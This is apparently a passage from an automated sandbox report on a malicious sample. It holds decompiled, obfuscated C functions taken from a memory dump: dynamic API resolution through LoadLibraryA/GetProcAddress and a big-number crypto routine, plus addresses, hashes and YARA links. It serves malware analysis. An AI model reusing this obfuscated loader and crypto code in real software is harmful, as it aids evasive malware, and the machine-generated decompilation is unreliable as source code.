										_t112 = E00979D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E00977DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E00977DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E009755A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0097d839
0x0097d83c
0x0097d83e
0x0097d840
0x0097d847
0x0097d852
0x0097d854
0x0097d85b
0x0097d860
0x0097d862
0x0097d865
0x0097d86d
0x0097d873
0x0097d873
0x0097d880
0x0097d894
0x0097d89f
0x0097d8af
0x0097d8b4
0x0097d8bb
0x0097d8be
0x0097d8c4
0x0097d8cc
0x0097d8d0
0x0097d8d2
0x0097d8d5
0x0097d8ea
0x0097d8f0
0x0097d90d
0x0097d912
0x0097d915
0x0097d919
0x0097d91b
0x0097d920
0x0097d92c
0x0097d942
0x0097d944
0x0097d949
0x0097d94c
0x0097d950
0x0097d920
0x0097d954
0x0097d95d
0x0097d962
0x0097d968
0x0097d98d
0x0097d9c4
0x0097d9d0
0x0097d9d8
0x0097d9db
0x0097d9e0
0x0097d9e5
0x0097d9e7
0x0097d9ea
0x0097d9ec
0x0097d9f2
0x0097d9fc
0x0097d9fe
0x0097da06
0x0097da0e
0x0097da11
0x0097da16
0x0097da19
0x0097da1c
0x0097da1e
0x0097da20
0x0097da22
0x0097da24
0x0097da24
0x0097da2c
0x0097da30
0x0097da30
0x0097da45
0x0097da51
0x0097da56
0x0097da5b
0x0097da61
0x0097da65
0x0097da68
0x0097da68
0x0097da30
0x0097da83
0x0097da88
0x0097da9a
0x0097daaa
0x0097dab1
0x0097dabe
0x0097dac8
0x0097dad7
0x0097dae5
0x0097daec
0x0097daf3
0x0097daf6
0x0097db05
0x0097db0c
0x0097db11
0x0097db14
0x0097db16
0x0097db54
0x0097db18
0x0097db1e
0x0097db21
0x0097db23
0x0097db59
0x0097db25
0x0097db25
0x0097db30
0x0097db35
0x0097db3a
0x0097db44
0x0097db47
0x0097db4a
0x0097db4b
0x0097db4b
0x0097db4f
0x0097db4f
0x0097db23
0x0097db70
0x0097db70
0x0097d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0097d96a
0x0097d973
0x0097d974
0x0097d977
0x0097d97a
0x0097d983
0x0097d983
0x0097d86d
0x0097db72
0x0097db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0097DB62
GetProcAddress.KERNEL32(00000000,?), ref: 0097DB6A

Strings

l, xrefs: 0097DAC8
d, xrefs: 0097DAB1

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: e2dde29181092aa467adffba875dca5cf72bd2c9e1edc038e6ede1ee8706702f
Instruction ID: 668457bc830a32f1e17399b7ad64adccfc9e28060b38f602270f5d4e84ed57c9
Opcode Fuzzy Hash: e2dde29181092aa467adffba875dca5cf72bd2c9e1edc038e6ede1ee8706702f
Instruction Fuzzy Hash: FD9128B7D002199BDB109FB49C42BBE7BB4AF55358F054065FC4DB7352E6319A08C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00971A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00971A00() {
				intOrPtr _t9;
				WCHAR* _t10;
				struct HINSTANCE__* _t15;

				_t9 =  *0x9920d8; // 0x53325ec4
				_t10 = _t9 + 0xffffffd4;
				_t15 = (_t10 | 0x00000008) * _t10;
				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
				GetVersion();
				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
			}

0x00971a06
0x00971a0c
0x00971a15
0x00971a1d
0x00971a39
0x00971a47

APIs

CreateDialogParamW.USER32 ref: 00971A1D
GetVersion.KERNEL32(?,00978614,0000031F,?,00976AB1,?,0097AE51), ref: 00971A39

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogParamVersion
String ID:
API String ID: 1068622756-0
Opcode ID: ee758de107777f32fb1c73d94b1fe012c8cf3d0ec4cf634adff675ff466e20f4
Instruction ID: 1eaec0be374e2039fd5f52cdb9cd3e5450f0a3d47089a9369016521cbc05a575
Opcode Fuzzy Hash: ee758de107777f32fb1c73d94b1fe012c8cf3d0ec4cf634adff675ff466e20f4
Instruction Fuzzy Hash: 33E09223A176386B52108A6FACC4C9BFF9CDE821AA3020227BA5CD36A0D1104C08C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 0098DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0098DA70(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int* _a12, void* _a16) {
				unsigned int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				void* _t304;
				signed int _t305;
				signed int _t309;
				void* _t311;
				signed int _t314;
				signed int _t317;
				signed int* _t319;
				signed int _t328;
				signed int _t329;
				void* _t331;
				void* _t336;
				void* _t338;
				void* _t344;
				intOrPtr _t347;
				void* _t355;
				signed int _t358;
				void* _t360;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t376;
				signed int* _t377;
				signed int _t379;
				signed int _t380;
				void* _t383;
				signed int _t387;
				void* _t396;
				void* _t401;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				intOrPtr _t414;
				void* _t415;
				signed int _t418;
				signed int _t421;
				void* _t425;
				void* _t426;
				signed char _t427;
				signed int _t432;
				intOrPtr _t434;
				signed char _t444;
				signed int _t445;
				intOrPtr _t450;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				signed int* _t461;
				signed int* _t463;
				signed int _t464;
				signed int _t465;
				signed int* _t466;
				signed int _t471;
				signed int _t472;
				intOrPtr* _t475;
				signed int* _t476;
				signed int _t478;
				signed int _t479;
				signed int _t481;
				signed int* _t484;
				unsigned int _t486;
				unsigned int _t490;
				signed int _t491;
				intOrPtr _t492;
				signed int _t495;
				signed int _t498;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed char _t507;
				intOrPtr* _t510;
				signed int _t525;
				signed int _t527;
				signed int _t532;
				signed int _t533;
				signed int _t542;
				signed int _t543;
				intOrPtr _t549;
				intOrPtr* _t551;
				signed int _t552;
				void* _t566;
				signed int _t569;
				signed int _t570;
				signed int* _t576;
				signed int _t581;
				signed int _t582;
				signed int* _t584;
				signed int _t586;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				void* _t600;
				void* _t602;
				void* _t604;
				void* _t606;
				void* _t621;
				void* _t629;
				void* _t632;
				void* _t633;
				void* _t634;
				void* _t635;

				_t532 = __edx;
				_t455 = _a12;
				_t584 = E0098EC10();
				_v28 = E0098EC10();
				_t549 = E0098EC10();
				_v68 = E0098EC10();
				_v40 = E0098EC10();
				_v80 = E0098EC10();
				_t304 = E0098E3C0(__ecx, __eflags, _a12, _a16);
				_t602 = _t600 - 0x70 + 8;
				if(_t304 == 0) {
					_t305 = E0098EBE0(_t455);
					_t602 = _t602 + 4;
					__eflags = _t305;
					if(_t305 == 0) {
						_v64 = _t549;
						_v52 = _t584;
						_t457 =  *_a16;
						__eflags = _t457 - 1;
						if(__eflags != 0) {
							_v24 =  *_a12;
							_t490 = E00971460(__eflags,  *_a12 - 0x1a86f375, 0x1a86f376);
							_t309 = _a4;
							_v44 = _t457;
							_v20 = _t490;
							_t56 = _t490 + 0x3df43c37; // 0x3df43c37
							_t311 = E009722E0(__eflags, _t56, _t457);
							_t604 = _t602 + 0x10;
							_t459 = _t311 + 0xc20bc3c9;
							__eflags =  *((intOrPtr*)(_t309 + 4)) - _t459;
							if( *((intOrPtr*)(_t309 + 4)) < _t459) {
								_t432 = _a4;
								_t581 = _t432;
								 *(_t432 + 4) = _t459;
								_t434 = E00973F90( *((intOrPtr*)(_t581 + 8)), _t459 * 4);
								_t604 = _t604 + 8;
								 *((intOrPtr*)(_t581 + 8)) = _t434;
							}
							_t551 = _v28;
							E00977D70(_a12, _t551);
							E00977D70(_a16, _t584);
							_t606 = _t604 + 0x10;
							_t314 =  *_t584;
							_t491 = _t584[2];
							_v32 = _t459;
							__eflags =  *(_t491 + _t314 * 4 - 4);
							if( *(_t491 + _t314 * 4 - 4) < 0) {
								_v56 = 0;
								_t460 = 1;
								goto L25;
							} else {
								_t525 = 0;
								__eflags = 0;
								_t481 = 1;
								do {
									_v56 = (_t525 << 0x00000020 | _t481) << 1;
									_v60 = _t481 + _t481;
									E0098E320(_t584, 0x992028);
									_t425 = E00971460(__eflags, E00979D50(0xfa78285f) +  *_t584, 0xffffffff);
									_t426 = E00979D50(0xfa78285f);
									_t481 = _v60;
									_t427 = E00976BB0(__eflags,  *((intOrPtr*)(_t584[2] + (_t425 - _t426) * 4)), 0xffffffff);
									_t525 = _v56;
									_t606 = _t606 + 0x20;
									__eflags = _t427 & 0x00000001;
								} while ((_t427 & 0x00000001) != 0);
								__eflags = _t481 | _t525;
								if((_t481 | _t525) == 0) {
									_t551 = _v28;
									_t460 = 0;
									__eflags = 0;
									_v56 = 0;
								} else {
									E0098E610(_v64, _t481);
									_t551 = _v28;
									E0098E320(_t551, _v64);
									_t606 = _t606 + 0x10;
								}
								L25:
								_t492 =  *_t551;
								__eflags = _t492 - _v20;
								if(_t492 != _v20) {
									_t576 = _v28;
									_t418 = _t492 + 1;
									 *_t576 = _t418;
									__eflags = _t492 - _t576[1];
									if(_t492 >= _t576[1]) {
										_t576[1] = _t418;
										__eflags = _t418 << 2;
										_t421 = E00973F90(_t576[2], _t418 << 2);
										_t606 = _t606 + 8;
										_t576[2] = _t421;
									}
									 *((intOrPtr*)(_t576[2] + _v24 * 4)) = 0;
								}
								_v60 = _t460;
								_t461 = _v28;
								__eflags = _v32;
								if(__eflags <= 0) {
									L53:
									_t317 = _a4;
									_t533 = _t317;
									_t495 =  *_a12 -  *_a16;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 8)) + _t495 * 4)) - 1;
									asm("sbb ecx, 0xffffffff");
									 *_t533 = _t495;
									_t586 =  *_t461;
									__eflags = _t586;
									if(_t586 <= 0) {
										__eflags = 0;
										L58:
										_t319 = _v28;
										 *_t319 = 0;
										_t463 = _t319;
										E00977D70(_t319, _a8);
										_t584 = _v52;
										_t549 = _v64;
										L6:
										_push(_t549);
										E0098EBC0();
										_push(_v68);
										E0098EBC0();
										_push(_v40);
										E0098EBC0();
										_push(_t463);
										E0098EBC0();
										_push(_t584);
										E0098EBC0();
										_push(_v80);
										return E0098EBC0();
									}
									_t464 = 0;
									_v24 = _t461[2];
									_t328 = 0;
									__eflags = 0;
									do {
										_t552 = _v24;
										_v32 =  *(_t552 + _t586 * 4 - 4);
										_t329 = E00983860( *(_t552 + _t586 * 4 - 4), _t328, _v60, _v56);
										__eflags = _t329;
										 *(_t552 + _t586 * 4 - 4) = _t329;
										_t535 =  !=  ? _t586 : _t464;
										__eflags = _t464;
										_t464 =  ==  ?  !=  ? _t586 : _t464 : _t464;
										_t498 = _t533 * _v60;
										_t533 = (_t329 * _v60 >> 0x20) + _t329 * _v56;
										_t331 = E00971A50(0, 0, _t329 * _v60, _t498 + _t533);
										_t606 = _t606 + 0x10;
										_t328 = _t331 + _v32;
										_t586 = _t586 - 1;
										__eflags = _t586;
									} while (_t586 > 0);
									goto L58;
								} else {
									_t465 = _v44;
									_v112 = E00971460(__eflags, _t465, 0xffffffff);
									_v96 = _t465 + 1;
									_v92 = 4 + _t465 * 4;
									_t336 = E00971460(__eflags, _v24, 0xa8f61def);
									_v20 = _v24 + 1;
									_t338 = E009722E0(__eflags, _v24 + 0x9ecacfc6, _t465);
									_v104 = E00979D50(0x5413097) + _t338;
									E009722E0(__eflags, _v20, _t465);
									_t344 = E009722E0(__eflags, E00971460(__eflags, _t465, 0xbfefafd5) + 1, 0xbfefafd5);
									E00971460(__eflags, _t465, 1);
									_t621 = _t606 + 0x3c;
									_t466 = _v28;
									_v100 = _t465 + 0x18a13f73;
									_t347 = 0;
									_v88 = _t344 + 0x3baa12e3;
									_v108 = _t336 - _t465 + 0x5709e211;
									_t590 = _v32;
									do {
										_v120 = _t347;
										_v116 = _v108 - _t347;
										E00971460(__eflags, _t590, 0xffffffff);
										_v84 = _t590;
										_v36 =  *((intOrPtr*)(_t466 + 8));
										_v76 = E009722E0(__eflags, _v100 + _t590, 0x18a13f74);
										_v32 = _t590 - 1;
										E00971460(__eflags, _t590 - 1, _v44);
										_t355 = E009713C0(E009722E0(__eflags, 0, 0xffffffff), 0,  *((intOrPtr*)(_v36 + _t352 * 4)),  *((intOrPtr*)(_v36 + (_t352 - _t354) * 4)), 0);
										_t502 = _v52[2];
										_t592 =  *(_t502 + _v112 * 4);
										_v72 = _t502;
										_t358 = E00983860(_t355, _t532, _t592, 0);
										__eflags = _t358 - 0xffffffff;
										_t503 = _t532;
										_v124 = _t592;
										asm("sbb edx, 0x0");
										_t538 =  <  ? _t503 : 0;
										_v20 =  <  ? _t503 : 0;
										_t540 =  <  ? _t358 : 0xffffffff;
										_v24 =  <  ? _t358 : 0xffffffff;
										_t542 = (_t358 * _t592 >> 0x20) + _t503 * _t592;
										asm("adc ebx, 0x2892411f");
										_t360 = E00971A50(_t355 + 0xd2627799, _t532, _t358 * _t592, _t542);
										_t471 = _t360 - E00972070(0xb6167735, 0xa7951915);
										asm("sbb esi, edx");
										_v48 = _t542;
										_v72 =  *((intOrPtr*)(_v72 + _v44 * 4 - 8));
										__eflags = _v76 + 0x6e556da6;
										_t366 = E00971460(_v76 + 0x6e556da6, _v76 + 0x6e556da6, 0xfffffffe);
										_t506 = _v20;
										_t629 = _t621 + 0x50;
										_t543 = _v36;
										_v128 =  *((intOrPtr*)(_t543 + 0x46aa4968 + _t366 * 4));
										_t368 = _v24;
										while(1) {
											_v20 = _t506;
											_v24 = _t368;
											_t369 = E00973A30(_t368, _t506, _v72, 0);
											_v36 = _t543;
											_t507 = E00972070(0x6474008c, 0x8f07580a);
											_v76 = _t471;
											_t472 = _t471 << _t507;
											__eflags = _t507 & 0x00000020;
											_t566 =  !=  ? _t472 : (_v48 << 0x00000020 | _t471) << _t507;
											_t473 =  !=  ? 0 : _t472;
											_t474 = ( !=  ? 0 : _t472) | _v128;
											_t376 = E00972070(0x6474008c, 0x8f07580a);
											_t632 = _t629 + 0x20;
											__eflags = (( !=  ? 0 : _t472) | _v128) - _t369;
											asm("sbb edi, [ebp-0x20]");
											if((( !=  ? 0 : _t472) | _v128) >= _t369) {
												break;
											}
											_t415 = E00972070(0x393c8f08, 0xec16389c);
											_t569 = _t543;
											asm("adc edi, ecx");
											_t595 = _t415 + _v24 + 0xa2b7705b;
											asm("adc edi, 0x9cee9f69");
											E00971750(__eflags, _v24, _v20, 0xffffffff, 0xffffffff);
											_t629 = _t632 + 0x18;
											_t368 = _t595;
											_t506 = _t569;
											_t471 = _v76 + _v124;
											__eflags = _t471;
											asm("adc dword [ebp-0x2c], 0x0");
											if(_t471 == 0) {
												continue;
											}
											L37:
											_t509 = _v80;
											_t475 = _v40;
											__eflags = _t569 - 1;
											asm("sbb edx, 0x0");
											_t377 =  *(_t509 + 8);
											 *_t377 = _t595;
											_t377[1] = _t569;
											 *_t509 = 2;
											E0098E690(_t569 - 1, _v68, _v52, _t509);
											_t633 = _t632 + 0xc;
											_t379 = _v44;
											__eflags = _t379 -  *((intOrPtr*)(_t475 + 4));
											if(_t379 >=  *((intOrPtr*)(_t475 + 4))) {
												 *((intOrPtr*)(_t475 + 4)) = _v96;
												_t414 = E00973F90( *((intOrPtr*)(_t475 + 8)), _v92);
												_t633 = _t633 + 8;
												 *((intOrPtr*)(_t475 + 8)) = _t414;
												_t379 = _v44;
											}
											__eflags = _t379;
											 *_t475 = 0;
											if(__eflags < 0) {
												L44:
												_t476 = _v40;
												_t380 = E0098E3C0(_t509, __eflags, _t476, _v68);
												_t634 = _t633 + 8;
												__eflags = _t380;
												if(_t380 != 0) {
													E0098E380(_t476, _v52);
													_t401 = E00979D50(0x11f2bfb2);
													_t634 = _t634 + 0xc;
													_t595 = _t595 + _t401 - 0x7586bf1f;
												}
												E0098E650(_t476, _v68);
												_t635 = _t634 + 8;
												_t570 =  *_t476;
												__eflags = _t570;
												if(_t570 > 0) {
													_t478 = 0;
													__eflags = 1;
													_v36 = 1 - _v84;
													_v20 = _v40[2];
													_v48 = _v28[2];
													0;
													0;
													do {
														_v24 =  *((intOrPtr*)(_v20 + _t478 * 4));
														_t396 = E009722E0(__eflags, 0, _t478);
														E00971460(__eflags, _t478, _v32);
														_t635 = _t635 + 0x10;
														_t478 = _t478 + 1;
														 *((intOrPtr*)(_v48 - (_t396 + _v36 << 2))) = _v24;
														_t570 =  *_v40;
														__eflags = _t478 - _t570;
													} while (__eflags < 0);
												}
												goto L49;
											} else {
												_t479 = 0;
												_v24 = _v28[2];
												_v20 = _v40[2];
												do {
													_t509 = _v24;
													_t408 =  *(_v24 + (_v32 + _t479) * 4);
													__eflags = _t408;
													 *(_v20 + _t479 * 4) = _t408;
													if(__eflags != 0) {
														_t412 = E009722E0(__eflags, 0, _t479);
														_t633 = _t633 + 8;
														_t509 = 1 - _t412;
														 *_v40 = 1 - _t412;
													}
													_t409 = E009722E0(__eflags, _t479, 0x19c77e59);
													_t410 = E00979D50(0x7db37ef5);
													E00971460(__eflags, _t479, 1);
													_t633 = _t633 + 0x14;
													__eflags = _t479 - _v44;
													_t479 = _t409 + _t410 + 1;
												} while (__eflags != 0);
												goto L44;
											}
										}
										_t595 = _v24;
										__eflags = _t376 & 0x00000020;
										_t569 =  ==  ? (_v20 << 0x00000020 | _t595) >> _t376 : _v20 >> _t376;
										goto L37;
										L49:
										__eflags = _t570 - _v44;
										if(_t570 <= _v44) {
											_t387 = E00971460(__eflags, _t570 - E00979D50(0x1f4aa581), _v116);
											__eflags = _v88 - _t570;
											E00983580(_v28[2] + _t387 * 4 - 0x13056b4c, 0, 0x1157b474 + (_v88 - _t570) * 4);
											_t635 = _t635 + 0x18;
										}
										_t510 = _a4;
										_t532 = _v84;
										__eflags = _t595;
										_t461 = _v28;
										 *( *((intOrPtr*)(_t510 + 8)) + _t532 * 4 - 4) = _t595;
										_t590 = _v32;
										if(_t595 != 0) {
											 *_t510 = _t590;
										}
										_t383 = E00979D50(0xf239476a);
										_t606 = _t635 + 4;
										_t347 = _v120 - _t383 + 0x964d47c7;
										__eflags = _t347 - _v104;
									} while (__eflags != 0);
									goto L53;
								}
							}
						}
						_t484 = _a12;
						_t527 = _a4;
						_t582 =  *_t484;
						__eflags =  *(_t527 + 4) - _t582;
						if( *(_t527 + 4) < _t582) {
							 *(_t527 + 4) = _t582;
							__eflags = _t582 << E00979D50(0x647400ae);
							_t450 = E00973F90( *((intOrPtr*)(_a4 + 8)), _t582 << E00979D50(0x647400ae));
							_t527 = _a4;
							_t602 = _t602 + 0xc;
							 *((intOrPtr*)(_t527 + 8)) = _t450;
							_t582 =  *_t484;
						}
						__eflags = _t582;
						if(_t582 <= 0) {
							__eflags = 0;
							goto L22;
						} else {
							_t486 = 0;
							_t599 = 0;
							__eflags = 0;
							_v48 = _t484[2];
							_v36 =  *((intOrPtr*)(_t527 + 8));
							_v32 =  *((intOrPtr*)(_a16 + 8));
							0;
							0;
							do {
								_v20 = _t486;
								_v24 =  *((intOrPtr*)(_v48 + _t582 * 4 - 4));
								 *((intOrPtr*)(_v36 + _t582 * 4 - 4)) = E00983860( *((intOrPtr*)(_v48 + _t582 * 4 - 4)), _t599,  *_v32, 0);
								_t444 = E00975920(_v36, _t443, 0);
								_t602 = _t602 + 8;
								__eflags = _t444 & 0x00000001;
								_t445 = _v20;
								_t487 =  !=  ? _t582 : _t486;
								__eflags = _t445;
								_t486 =  !=  ? _t445 :  !=  ? _t582 : _t486;
								_t599 = E00982E20(_v24, _t599,  *_v32, 0);
								_t582 = _t582 - 1;
								__eflags = _t582;
							} while (_t582 > 0);
							L22:
							_t549 = _v64;
							E0098E610(_a8, 0);
							_t584 = _v52;
							 *_a4 = 0;
							L5:
							_t463 = _v28;
							goto L6;
						}
					}
					 *_a4 = 0;
					E0098E610(_a8, 0);
					L4:
					goto L5;
				}
				 *_a4 = 0;
				E00977D70(_t455, _a8);
				goto L4;
			}

0x0098da70
0x0098da79
0x0098da81
0x0098da88
0x0098da90
0x0098da97
0x0098da9f
0x0098daa7
0x0098daae
0x0098dab3
0x0098dab8
0x0098dacf
0x0098dad4
0x0098dad7
0x0098dad9
0x0098db38
0x0098db3b
0x0098db3e
0x0098db40
0x0098db43
0x0098dc09
0x0098dc20
0x0098dc22
0x0098dc25
0x0098dc28
0x0098dc2e
0x0098dc36
0x0098dc3b
0x0098dc40
0x0098dc46
0x0098dc48
0x0098dc4a
0x0098dc4d
0x0098dc4f
0x0098dc5d
0x0098dc62
0x0098dc65
0x0098dc65
0x0098dc68
0x0098dc6f
0x0098dc7b
0x0098dc80
0x0098dc83
0x0098dc85
0x0098dc88
0x0098dc8b
0x0098dc90
0x0098dd44
0x0098dd4b
0x00000000
0x0098dc96
0x0098dc96
0x0098dc96
0x0098dc98
0x0098dca0
0x0098dca6
0x0098dca9
0x0098dcb2
0x0098dcd1
0x0098dce0
0x0098dcef
0x0098dcf2
0x0098dcf7
0x0098dcfa
0x0098dcfd
0x0098dcfd
0x0098dd03
0x0098dd05
0x0098dd52
0x0098dd55
0x0098dd55
0x0098dd57
0x0098dd07
0x0098dd0c
0x0098dd15
0x0098dd19
0x0098dd1e
0x0098dd1e
0x0098dd5e
0x0098dd61
0x0098dd63
0x0098dd65
0x0098dd67
0x0098dd6a
0x0098dd6d
0x0098dd6f
0x0098dd72
0x0098dd74
0x0098dd77
0x0098dd7e
0x0098dd83
0x0098dd86
0x0098dd86
0x0098dd8f
0x0098dd8f
0x0098dd99
0x0098dd9c
0x0098dd9f
0x0098dda1
0x0098e285
0x0098e288
0x0098e290
0x0098e295
0x0098e297
0x0098e29b
0x0098e29e
0x0098e2a0
0x0098e2a2
0x0098e2a4
0x0098e300
0x0098e302
0x0098e302
0x0098e305
0x0098e307
0x0098e30d
0x0098e315
0x0098e318
0x0098daf4
0x0098daf4
0x0098daf5
0x0098dafd
0x0098db00
0x0098db08
0x0098db0b
0x0098db13
0x0098db14
0x0098db1c
0x0098db1d
0x0098db25
0x0098db34
0x0098db34
0x0098e2a9
0x0098e2ab
0x0098e2ae
0x0098e2ae
0x0098e2b0
0x0098e2b0
0x0098e2b7
0x0098e2c2
0x0098e2c9
0x0098e2cd
0x0098e2d3
0x0098e2d6
0x0098e2d8
0x0098e2e2
0x0098e2e6
0x0098e2f0
0x0098e2f5
0x0098e2f8
0x0098e2fb
0x0098e2fb
0x0098e2fb
0x00000000
0x0098dda7
0x0098dda9
0x0098ddb5
0x0098ddbb
0x0098ddc5
0x0098ddd3
0x0098dde6
0x0098ddeb
0x0098de04
0x0098de0b
0x0098de28
0x0098de35
0x0098de3a
0x0098de45
0x0098de54
0x0098de57
0x0098de59
0x0098de5c
0x0098de5f
0x0098de92
0x0098de95
0x0098de9d
0x0098dea3
0x0098deae
0x0098deb1
0x0098dec9
0x0098decf
0x0098ded3
0x0098def7
0x0098df06
0x0098df0c
0x0098df0f
0x0098df17
0x0098df1c
0x0098df1f
0x0098df21
0x0098df24
0x0098df2c
0x0098df2f
0x0098df37
0x0098df3d
0x0098df42
0x0098df4a
0x0098df54
0x0098df72
0x0098df7a
0x0098df7c
0x0098df83
0x0098df89
0x0098df91
0x0098df96
0x0098df99
0x0098df9c
0x0098dfa6
0x0098dfa9
0x0098dfb0
0x0098dfb5
0x0098dfb9
0x0098dfbd
0x0098dfcc
0x0098dfe1
0x0098dfe3
0x0098dfee
0x0098dff0
0x0098dff3
0x0098dff6
0x0098dffe
0x0098e008
0x0098e00d
0x0098e010
0x0098e012
0x0098e015
0x00000000
0x00000000
0x0098e021
0x0098e031
0x0098e035
0x0098e037
0x0098e03d
0x0098e049
0x0098e04e
0x0098e054
0x0098e056
0x0098e058
0x0098e058
0x0098e05b
0x0098e05f
0x00000000
0x00000000
0x0098e084
0x0098e084
0x0098e087
0x0098e08a
0x0098e092
0x0098e095
0x0098e098
0x0098e09a
0x0098e09d
0x0098e0a6
0x0098e0ab
0x0098e0ae
0x0098e0b1
0x0098e0b4
0x0098e0b9
0x0098e0c2
0x0098e0c7
0x0098e0ca
0x0098e0cd
0x0098e0cd
0x0098e0d0
0x0098e0d2
0x0098e0d8
0x0098e170
0x0098e173
0x0098e177
0x0098e17c
0x0098e17f
0x0098e181
0x0098e187
0x0098e194
0x0098e199
0x0098e19c
0x0098e19c
0x0098e1a7
0x0098e1ac
0x0098e1af
0x0098e1b1
0x0098e1b3
0x0098e1bd
0x0098e1bf
0x0098e1c5
0x0098e1c8
0x0098e1d1
0x0098e1da
0x0098e1de
0x0098e1e0
0x0098e1e6
0x0098e1ec
0x0098e1fd
0x0098e202
0x0098e20e
0x0098e211
0x0098e216
0x0098e218
0x0098e218
0x0098e1e0
0x00000000
0x0098e0de
0x0098e0e1
0x0098e0e6
0x0098e0ef
0x0098e133
0x0098e136
0x0098e13e
0x0098e141
0x0098e143
0x0098e146
0x0098e14b
0x0098e150
0x0098e15b
0x0098e15d
0x0098e15d
0x0098e106
0x0098e115
0x0098e124
0x0098e129
0x0098e12c
0x0098e12f
0x0098e12f
0x00000000
0x0098e133
0x0098e0d8
0x0098e070
0x0098e07f
0x0098e081
0x00000000
0x0098e21c
0x0098e21c
0x0098e21f
0x0098e23c
0x0098e24e
0x0098e25b
0x0098e260
0x0098e260
0x0098e263
0x0098e266
0x0098e269
0x0098e26b
0x0098e271
0x0098e275
0x0098e278
0x0098e27e
0x0098e27e
0x0098de75
0x0098de7a
0x0098de84
0x0098de89
0x0098de89
0x00000000
0x0098de92
0x0098dda1
0x0098dc90
0x0098db49
0x0098db4c
0x0098db4f
0x0098db51
0x0098db54
0x0098db56
0x0098db68
0x0098db71
0x0098db76
0x0098db79
0x0098db7c
0x0098db7f
0x0098db7f
0x0098db81
0x0098db83
0x0098dd25
0x00000000
0x0098db89
0x0098db8f
0x0098db91
0x0098db91
0x0098db93
0x0098db99
0x0098db9f
0x0098dba8
0x0098dbac
0x0098dbb0
0x0098dbb3
0x0098dbba
0x0098dbce
0x0098dbd5
0x0098dbda
0x0098dbdd
0x0098dbdf
0x0098dbe2
0x0098dbe5
0x0098dbe7
0x0098dbfa
0x0098dbfc
0x0098dbfc
0x0098dbfc
0x0098dd27
0x0098dd27
0x0098dd2f
0x0098dd3a
0x0098dd3d
0x0098daf1
0x0098daf1
0x00000000
0x0098daf1
0x0098db83
0x0098dade
0x0098dae9
0x0098daee
0x00000000
0x0098daee
0x0098dabd
0x0098dac7
0x00000000

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID:
